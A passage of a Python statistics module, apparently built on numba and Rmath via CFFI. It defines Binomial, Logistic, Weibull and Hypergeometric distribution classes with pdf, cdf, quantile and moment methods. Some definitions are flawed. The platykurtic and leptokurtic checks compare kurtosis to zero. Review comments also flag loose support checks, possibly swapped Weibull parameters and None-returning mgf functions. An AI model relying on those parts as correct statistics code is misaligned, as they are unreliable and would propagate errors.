    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # NOTE(review): accepts any int, including negatives -- confirm intent.
        return isinstance(x, int)

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return geom_pdf(self.p, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return geom_logpdf(self.p, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(geom_logpdf(self.p, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return geom_cdf(self.p, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return geom_ccdf(self.p, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return geom_logcdf(self.p, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return geom_logccdf(self.p, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return geom_invcdf(self.p, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return geom_invccdf(self.p, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return geom_invlogcdf(self.p, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return geom_invlogccdf(self.p, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # ndenumerate keeps the loop nopython-friendly while filling in place.
        for i, _ in np.ndenumerate(out):
            out[i] = geom_rand(self.p)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath C entry points for the binomial distribution (via CFFI).
# Rmath order: dbinom(x, size, prob, give_log), pbinom(..., lower_tail, log_p).
dbinom = _rmath_ffi.lib.dbinom
pbinom = _rmath_ffi.lib.pbinom
qbinom = _rmath_ffi.lib.qbinom


@vectorize(nopython=True)
def binom_pdf(n, p, x):
    """Binomial pmf at x for n trials with success probability p."""
    return dbinom(x, n, p, 0)


@vectorize(nopython=True)
def binom_logpdf(n, p, x):
    """Log of the binomial pmf at x."""
    return dbinom(x, n, p, 1)


@vectorize(nopython=True)
def binom_cdf(n, p, x):
    """Binomial CDF P(X <= x)."""
    return pbinom(x, n, p, 1, 0)


@vectorize(nopython=True)
def binom_ccdf(n, p, x):
    """Binomial complementary CDF P(X > x)."""
    return pbinom(x, n, p, 0, 0)


@vectorize(nopython=True)
def binom_logcdf(n, p, x):
    """Log of the binomial CDF."""
    return pbinom(x, n, p, 1, 1)


@vectorize(nopython=True)
def binom_logccdf(n, p, x):
    """Log of the binomial complementary CDF."""
    return pbinom(x, n, p, 0, 1)


@vectorize(nopython=True)
def binom_invcdf(n, p, q):
    """Binomial quantile function at q."""
    return qbinom(q, n, p, 1, 0)


@vectorize(nopython=True)
def binom_invccdf(n, p, q):
    """Binomial complementary quantile at q."""
    return qbinom(q, n, p, 0, 0)


@vectorize(nopython=True)
def binom_invlogcdf(n, p, lq):
    """Inverse of the log-CDF."""
    return qbinom(lq, n, p, 1, 1)


@vectorize(nopython=True)
def binom_invlogccdf(n, p, lq):
    """Inverse of the log-CCDF."""
    return qbinom(lq, n, p, 0, 1)


rbinom = _rmath_ffi.lib.rbinom


@jit(nopython=True)
def binom_rand(n, p):
    """Draw a single Binomial(n, p) variate from Rmath's RNG."""
    return rbinom(n, p)


@vectorize(nopython=True)
def binom_mgf(n, p, x):
    """Binomial MGF: (1 - p + p*e^x)^n."""
    return (1 - p + p*np.exp(x))**n


@vectorize(nopython=True)
def binom_cf(n, p, x):
    """Binomial characteristic function: (1 - p + p*e^{ix})^n."""
    return (1 - p + p*np.exp(x*1j))**n
# -------------
# Binomial
# -------------

# numba jitclass field specification: trial count int32, probability float32.
spec = [
    ('n', int32), ("p", float32)
]


@jitclass(spec)
class Binomial():
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Binomial'])

    def __init__(self, n, p):
        # n: number of trials (non-negative integer);
        # p: per-trial success probability in [0, 1].
        self.n, self.p = n, p

    def __str__(self):
        return "Binomial(n=%.5f, p=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.n, self.p)

    @property
    def location(self):
        """Return location parameter if exists."""
        return None

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return None

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        return self.n*self.p

    @property
    def median(self):
        """Return the median."""
        # The median lies in [floor(np), ceil(np)]; both bounds are returned.
        return (np.floor(self.n*self.p), np.ceil(self.n*self.p))

    @property
    def mode(self):
        """Return the mode."""
        # Both candidates of the standard mode formula are returned; they
        # coincide unless (n+1)p is an integer.
        return (np.floor((self.n + 1)*self.p), np.ceil((self.n + 1)*self.p) - 1)

    @property
    def var(self):
        """Return the variance."""
        return self.n*self.p*(1 - self.p)

    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)

    @property
    def skewness(self):
        """Return the skewness."""
        return (1 - 2*self.p)/(np.sqrt(self.n*self.p*(1 - self.p)))

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # Full (non-excess) kurtosis: 3 + (1 - 6pq)/(npq).
        return 3 + (1 - 6*self.p*(1 - self.p))/(self.n*self.p*(1 - self.p))

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # Normal-approximation entropy 0.5*log(2*pi*e*npq);
        # accurate only for large n.
        return .5*np.log(2*np.pi*np.e*self.n*self.p*(1 - self.p))

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return binom_mgf(self.n, self.p, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return binom_cf(self.n, self.p, x)

    # ==========
    # Evaluation
    # ==========

    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # NOTE(review): accepts any int; the support is 0..n -- confirm intent.
        return isinstance(x, int)

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return binom_pdf(self.n, self.p, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return binom_logpdf(self.n, self.p, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(binom_logpdf(self.n, self.p, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return binom_cdf(self.n, self.p, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return binom_ccdf(self.n, self.p, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return binom_logcdf(self.n, self.p, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return binom_logccdf(self.n, self.p, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return binom_invcdf(self.n, self.p, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return binom_invccdf(self.n, self.p, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return binom_invlogcdf(self.n, self.p, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return binom_invlogccdf(self.n, self.p, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # ndenumerate keeps the loop nopython-friendly while filling in place.
        for i, _ in np.ndenumerate(out):
            out[i] = binom_rand(self.n, self.p)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath C entry points for the logistic distribution (via CFFI).
# Rmath order: dlogis(x, location, scale, give_log), etc.
dlogis = _rmath_ffi.lib.dlogis
plogis = _rmath_ffi.lib.plogis
qlogis = _rmath_ffi.lib.qlogis


@vectorize(nopython=True)
def logis_pdf(mu, theta, x):
    """Logistic density at x (location mu, scale theta)."""
    return dlogis(x, mu, theta, 0)


@vectorize(nopython=True)
def logis_logpdf(mu, theta, x):
    """Log of the logistic density at x."""
    return dlogis(x, mu, theta, 1)


@vectorize(nopython=True)
def logis_cdf(mu, theta, x):
    """Logistic CDF P(X <= x)."""
    return plogis(x, mu, theta, 1, 0)


@vectorize(nopython=True)
def logis_ccdf(mu, theta, x):
    """Logistic complementary CDF P(X > x)."""
    return plogis(x, mu, theta, 0, 0)


@vectorize(nopython=True)
def logis_logcdf(mu, theta, x):
    """Log of the logistic CDF."""
    return plogis(x, mu, theta, 1, 1)


@vectorize(nopython=True)
def logis_logccdf(mu, theta, x):
    """Log of the logistic complementary CDF."""
    return plogis(x, mu, theta, 0, 1)


@vectorize(nopython=True)
def logis_invcdf(mu, theta, q):
    """Logistic quantile function at q."""
    return qlogis(q, mu, theta, 1, 0)


@vectorize(nopython=True)
def logis_invccdf(mu, theta, q):
    """Logistic complementary quantile at q."""
    return qlogis(q, mu, theta, 0, 0)


@vectorize(nopython=True)
def logis_invlogcdf(mu, theta, lq):
    """Inverse of the log-CDF."""
    return qlogis(lq, mu, theta, 1, 1)


@vectorize(nopython=True)
def logis_invlogccdf(mu, theta, lq):
    """Inverse of the log-CCDF."""
    return qlogis(lq, mu, theta, 0, 1)


rlogis = _rmath_ffi.lib.rlogis


@jit(nopython=True)
def logis_rand(mu, theta):
    """Draw a single Logistic(mu, theta) variate from Rmath's RNG."""
    return rlogis(mu, theta)


@vectorize(nopython=True)
def logis_mgf(mu, theta, x):
    # Logistic MGF: exp(mu*x) * B(1 - theta*x, 1 + theta*x),
    # defined for |theta*x| < 1.
    # `beta` is defined elsewhere in this module (Euler beta function).
    return np.exp(mu*x)*beta(1 - theta*x, 1 + theta*x)


@vectorize(nopython=True)
def logis_cf(mu, theta, x):
    """Logistic characteristic function: e^{i mu x} * pi theta x / sinh(pi theta x)."""
    return np.exp(mu*x*1j)*np.pi*theta*x/np.sinh(np.pi*theta*x)
# -------------
# Logistic
# -------------

# numba jitclass field specification: both parameters stored as float32.
spec = [
    ('mu', float32), ("theta", float32)
]


@jitclass(spec)
class Logistic():
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Logistic'])

    def __init__(self, mu, theta):
        # mu: location parameter; theta: scale parameter (assumed > 0).
        self.mu, self.theta = mu, theta

    def __str__(self):
        return "Logistic(mu=%.5f, theta=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.mu, self.theta)

    @property
    def location(self):
        """Return location parameter if exists."""
        return self.mu

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return self.theta

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        return self.mu

    @property
    def median(self):
        """Return the median."""
        return self.mu

    @property
    def mode(self):
        """Return the mode."""
        return self.mu

    @property
    def var(self):
        """Return the variance."""
        # Logistic variance: (theta^2 * pi^2) / 3.
        return (self.theta**2 * np.pi**2)/3

    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)

    @property
    def skewness(self):
        """Return the skewness."""
        # The logistic distribution is symmetric.
        return 0

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # Full kurtosis: 3 plus excess kurtosis 6/5.
        return 3 + 1.2

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # Differential entropy: log(theta) + 2.
        return np.log(self.theta) + 2

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return logis_mgf(self.mu, self.theta, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return logis_cf(self.mu, self.theta, x)

    # ==========
    # Evaluation
    # ==========

    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # Support is the whole real line.
        return -np.inf < x < np.inf

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return logis_pdf(self.mu, self.theta, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return logis_logpdf(self.mu, self.theta, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(logis_logpdf(self.mu, self.theta, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return logis_cdf(self.mu, self.theta, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return logis_ccdf(self.mu, self.theta, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return logis_logcdf(self.mu, self.theta, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return logis_logccdf(self.mu, self.theta, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return logis_invcdf(self.mu, self.theta, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return logis_invccdf(self.mu, self.theta, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return logis_invlogcdf(self.mu, self.theta, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return logis_invlogccdf(self.mu, self.theta, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # ndenumerate keeps the loop nopython-friendly while filling in place.
        for i, _ in np.ndenumerate(out):
            out[i] = logis_rand(self.mu, self.theta)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath C entry points for the Weibull distribution (via CFFI).
# NOTE(review): Rmath's signature is dweibull(x, shape, scale, give_log), but
# these wrappers pass alpha first -- and the Weibull class below treats alpha
# as the *scale* and theta as the *shape*. If that reading is right, alpha and
# theta arrive swapped at the C level; confirm against rvlib's intended
# parameterization.
dweibull = _rmath_ffi.lib.dweibull
pweibull = _rmath_ffi.lib.pweibull
qweibull = _rmath_ffi.lib.qweibull


@vectorize(nopython=True)
def weibull_pdf(alpha, theta, x):
    """Weibull density at x."""
    return dweibull(x, alpha, theta, 0)


@vectorize(nopython=True)
def weibull_logpdf(alpha, theta, x):
    """Log of the Weibull density at x."""
    return dweibull(x, alpha, theta, 1)


@vectorize(nopython=True)
def weibull_cdf(alpha, theta, x):
    """Weibull CDF P(X <= x)."""
    return pweibull(x, alpha, theta, 1, 0)


@vectorize(nopython=True)
def weibull_ccdf(alpha, theta, x):
    """Weibull complementary CDF P(X > x)."""
    return pweibull(x, alpha, theta, 0, 0)


@vectorize(nopython=True)
def weibull_logcdf(alpha, theta, x):
    """Log of the Weibull CDF."""
    return pweibull(x, alpha, theta, 1, 1)


@vectorize(nopython=True)
def weibull_logccdf(alpha, theta, x):
    """Log of the Weibull complementary CDF."""
    return pweibull(x, alpha, theta, 0, 1)


@vectorize(nopython=True)
def weibull_invcdf(alpha, theta, q):
    """Weibull quantile function at q."""
    return qweibull(q, alpha, theta, 1, 0)


@vectorize(nopython=True)
def weibull_invccdf(alpha, theta, q):
    """Weibull complementary quantile at q."""
    return qweibull(q, alpha, theta, 0, 0)


@vectorize(nopython=True)
def weibull_invlogcdf(alpha, theta, lq):
    """Inverse of the log-CDF."""
    return qweibull(lq, alpha, theta, 1, 1)


@vectorize(nopython=True)
def weibull_invlogccdf(alpha, theta, lq):
    """Inverse of the log-CCDF."""
    return qweibull(lq, alpha, theta, 0, 1)


rweibull = _rmath_ffi.lib.rweibull


@jit(nopython=True)
def weibull_rand(alpha, theta):
    """Draw a single Weibull variate from Rmath's RNG."""
    return rweibull(alpha, theta)


@vectorize(nopython=True)
def weibull_mgf(alpha, theta, x):
    # No closed-form MGF is provided here.
    # NOTE(review): returning None from a nopython vectorize is unlikely to
    # compile if this is ever called -- confirm intended behavior.
    return None


@vectorize(nopython=True)
def weibull_cf(alpha, theta, x):
    # No closed-form characteristic function is provided here (same caveat
    # as weibull_mgf regarding the None return).
    return None
# -------------
# Weibull
# -------------

# numba jitclass field specification: both parameters stored as float32.
spec = [
    ('alpha', float32), ("theta", float32)
]


@jitclass(spec)
class Weibull():
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Weibull'])

    def __init__(self, alpha, theta):
        # Per the properties below: alpha is the scale, theta is the shape.
        # NOTE(review): the weibull_* wrappers pass alpha into Rmath's *shape*
        # slot (dweibull(x, shape, scale, ...)), which contradicts this
        # reading -- confirm the intended parameter order.
        self.alpha, self.theta = alpha, theta

    def __str__(self):
        return "Weibull(alpha=%.5f, theta=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.alpha, self.theta)

    @property
    def location(self):
        """Return location parameter if exists."""
        return None

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return self.alpha

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return self.theta

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        # alpha * Gamma(1 + 1/theta); `gamma` is defined elsewhere in this module.
        return self.alpha*gamma(1 + 1/self.theta)

    @property
    def median(self):
        """Return the median."""
        return self.alpha*(np.log(2))**(1/self.theta)

    @property
    def mode(self):
        """Return the mode."""
        # NOTE(review): this formula assumes theta > 1; for theta <= 1 the
        # mode is 0 -- confirm whether that case matters to callers.
        return self.alpha*((self.theta - 1)/self.theta)**(1/self.theta)

    @property
    def var(self):
        """Return the variance."""
        return self.alpha**2*(gamma(1 + 2/self.theta) - (gamma(1 + 1/self.theta))**2)

    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)

    @property
    def skewness(self):
        """Return the skewness."""
        # (Gamma(1+3/theta)*alpha^3 - 3*mean*var - mean^3) / var^(3/2).
        return (gamma(1 + 3/self.theta)*self.alpha**3 - 3*self.mean*self.var - self.mean**3)/(self.var**(3/2))

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        return (self.alpha**4*gamma(1 + 4/self.theta) - 4*self.skewness* self.var**(3/2)*self.mean - 6*self.mean**2*self.var - self.mean**4)/(self.var**2)

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # gamma_E * (1 - 1/theta) + log(alpha/theta) + 1, where the literal
        # constant is the Euler-Mascheroni constant.
        return 0.577215664901532860606512090082 * (1 - 1/self.theta) + np.log(self.alpha/self.theta) + 1

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return weibull_mgf(self.alpha, self.theta, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return weibull_cf(self.alpha, self.theta, x)

    # ==========
    # Evaluation
    # ==========

    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # Support is the non-negative half-line.
        return 0 <= x < np.inf

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return weibull_pdf(self.alpha, self.theta, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return weibull_logpdf(self.alpha, self.theta, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(weibull_logpdf(self.alpha, self.theta, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return weibull_cdf(self.alpha, self.theta, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return weibull_ccdf(self.alpha, self.theta, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return weibull_logcdf(self.alpha, self.theta, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return weibull_logccdf(self.alpha, self.theta, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return weibull_invcdf(self.alpha, self.theta, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return weibull_invccdf(self.alpha, self.theta, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return weibull_invlogcdf(self.alpha, self.theta, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return weibull_invlogccdf(self.alpha, self.theta, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # ndenumerate keeps the loop nopython-friendly while filling in place.
        for i, _ in np.ndenumerate(out):
            out[i] = weibull_rand(self.alpha, self.theta)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath C entry points for the hypergeometric distribution (via CFFI).
# Parameters follow Rmath's dhyper(x, m, n, k, give_log):
#   s = number of success states in the population,
#   f = number of failure states, n = number of draws.
dhyper = _rmath_ffi.lib.dhyper
phyper = _rmath_ffi.lib.phyper
qhyper = _rmath_ffi.lib.qhyper


@vectorize(nopython=True)
def hyper_pdf(s, f, n, x):
    """Hypergeometric pmf at x."""
    return dhyper(x, s, f, n, 0)


@vectorize(nopython=True)
def hyper_logpdf(s, f, n, x):
    """Log of the hypergeometric pmf at x."""
    return dhyper(x, s, f, n, 1)


@vectorize(nopython=True)
def hyper_cdf(s, f, n, x):
    """Hypergeometric CDF P(X <= x)."""
    return phyper(x, s, f, n, 1, 0)


@vectorize(nopython=True)
def hyper_ccdf(s, f, n, x):
    """Hypergeometric complementary CDF P(X > x)."""
    return phyper(x, s, f, n, 0, 0)


@vectorize(nopython=True)
def hyper_logcdf(s, f, n, x):
    """Log of the hypergeometric CDF."""
    return phyper(x, s, f, n, 1, 1)


@vectorize(nopython=True)
def hyper_logccdf(s, f, n, x):
    """Log of the hypergeometric complementary CDF."""
    return phyper(x, s, f, n, 0, 1)


@vectorize(nopython=True)
def hyper_invcdf(s, f, n, q):
    """Hypergeometric quantile function at q."""
    return qhyper(q, s, f, n, 1, 0)


@vectorize(nopython=True)
def hyper_invccdf(s, f, n, q):
    """Hypergeometric complementary quantile at q."""
    return qhyper(q, s, f, n, 0, 0)


@vectorize(nopython=True)
def hyper_invlogcdf(s, f, n, lq):
    """Inverse of the log-CDF."""
    return qhyper(lq, s, f, n, 1, 1)


@vectorize(nopython=True)
def hyper_invlogccdf(s, f, n, lq):
    """Inverse of the log-CCDF."""
    return qhyper(lq, s, f, n, 0, 1)


rhyper = _rmath_ffi.lib.rhyper


@jit(nopython=True)
def hyper_rand(s, f, n):
    """Draw a single hypergeometric variate from Rmath's RNG."""
    return rhyper(s, f, n)


@vectorize(nopython=True)
def hyper_mgf(s, f, n, x):
    # The hypergeometric MGF has no elementary closed form; not implemented.
    # NOTE(review): returning None from a nopython vectorize is unlikely to
    # compile if this is ever called -- confirm intended behavior.
    return None


@vectorize(nopython=True)
def hyper_cf(s, f, n, x):
    # Not implemented (same caveat as hyper_mgf regarding the None return).
    return None
# -------------
# Hypergeometric
# -------------
spec = [
('s', int32), ("f", int32), ("n", int32)
]
@jitclass(spec)
class Hypergeometric():
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Hypergeometric'])

    def __init__(self, s, f, n):
        # s: successes in the population, f: failures, n: number of draws
        self.s, self.f, self.n = s, f, n

    def __str__(self):
        return "Hypergeometric(s=%.5f, f=%.5f, n=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================
    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.s, self.f, self.n)

    @property
    def location(self):
        """Return location parameter if exists."""
        return None

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return None

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None

    # ==========
    # Statistics
    # ==========
    @property
    def mean(self):
        """Return the mean."""
        return self.n*(self.s/(self.s + self.f))

    @property
    def median(self):
        """Return the median."""
        return None

    @property
    def mode(self):
        """Return the mode."""
        return np.floor((self.n + 1)*(self.s + 1)/(self.s + self.f + 2))

    @property
    def var(self):
        """Return the variance."""
        return self.n*(self.s/(self.s + self.f))*(self.f/(self.s + self.f))* (self.s + self.f - self.n)/(self.s + self.f - 1)

    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)

    @property
    def skewness(self):
        """Return the skewness."""
        # Fixed: with N = s + f and K = s the skewness is
        #   (N - 2K)*sqrt(N - 1)*(N - 2n) / (sqrt(n*K*(N - K)*(N - n))*(N - 2)).
        # The previous code used `f` where (f - s) == N - 2K is required and
        # `n*s*s` where n*s*f == n*K*(N - K) is required.
        return ((self.f - self.s)*(self.s + self.f - 1)**(.5)* (self.s + self.f - 2*self.n))/(((self.n*self.s*self.f* (self.s + self.f - self.n))**(.5)*(self.s + self.f - 2)))

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        return 3 + 1/(self.n*self.s*self.f*(self.s + self.f - self.n)* (self.s + self.f - 2)*(self.s + self.f - 3))* ((self.s + self.f - 1)*(self.s + self.f)**2*((self.s + self.f)* (self.s + self.f + 1) - 6*self.s*self.f - 6*self.n* (self.s + self.f -self.n)) + 6*self.n*self.s*self.f* (self.s + self.f - self.n)*(5*(self.s + self.f) - 6))

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        return None

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return hyper_mgf(self.s, self.f, self.n, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return hyper_cf(self.s, self.f, self.n, x)

    # ==========
    # Evaluation
    # ==========
    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # NOTE(review): only checks the type, not the value range
        return isinstance(x, int)

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return hyper_pdf(self.s, self.f, self.n, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return hyper_logpdf(self.s, self.f, self.n, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(hyper_logpdf(self.s, self.f, self.n, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return hyper_cdf(self.s, self.f, self.n, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return hyper_ccdf(self.s, self.f, self.n, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return hyper_logcdf(self.s, self.f, self.n, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return hyper_logccdf(self.s, self.f, self.n, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return hyper_invcdf(self.s, self.f, self.n, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return hyper_invccdf(self.s, self.f, self.n, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return hyper_invlogcdf(self.s, self.f, self.n, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return hyper_invlogccdf(self.s, self.f, self.n, lq)

    # ========
    # Sampling
    # ========
    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        for i, _ in np.ndenumerate(out):
            out[i] = hyper_rand(self.s, self.f, self.n)
        return out
# ============================= NEW DISTRIBUTION =================================
# C entry points from the Rmath FFI library: density, CDF and quantile
# of the negative binomial distribution.
dnbinom = _rmath_ffi.lib.dnbinom
pnbinom = _rmath_ffi.lib.pnbinom
qnbinom = _rmath_ffi.lib.qnbinom

# For p/q functions the trailing integer flags select, in order,
# lower-tail and log-scale variants (consistent with how the cdf/ccdf and
# log* wrappers below combine them).
@vectorize(nopython=True)
def nbinom_pdf(r, p, x):
    return dnbinom(x, r, p, 0)

@vectorize(nopython=True)
def nbinom_logpdf(r, p, x):
    return dnbinom(x, r, p, 1)

@vectorize(nopython=True)
def nbinom_cdf(r, p, x):
    return pnbinom(x, r, p, 1, 0)

@vectorize(nopython=True)
def nbinom_ccdf(r, p, x):
    return pnbinom(x, r, p, 0, 0)

@vectorize(nopython=True)
def nbinom_logcdf(r, p, x):
    return pnbinom(x, r, p, 1, 1)

@vectorize(nopython=True)
def nbinom_logccdf(r, p, x):
    return pnbinom(x, r, p, 0, 1)

@vectorize(nopython=True)
def nbinom_invcdf(r, p, q):
    return qnbinom(q, r, p, 1, 0)

@vectorize(nopython=True)
def nbinom_invccdf(r, p, q):
    return qnbinom(q, r, p, 0, 0)

@vectorize(nopython=True)
def nbinom_invlogcdf(r, p, lq):
    return qnbinom(lq, r, p, 1, 1)

@vectorize(nopython=True)
def nbinom_invlogccdf(r, p, lq):
    return qnbinom(lq, r, p, 0, 1)

# random sampler from the same FFI library
rnbinom = _rmath_ffi.lib.rnbinom

@jit(nopython=True)
def nbinom_rand(r, p):
    return rnbinom(r, p)

# closed-form moment generating / characteristic functions
@vectorize(nopython=True)
def nbinom_mgf(r, p, x):
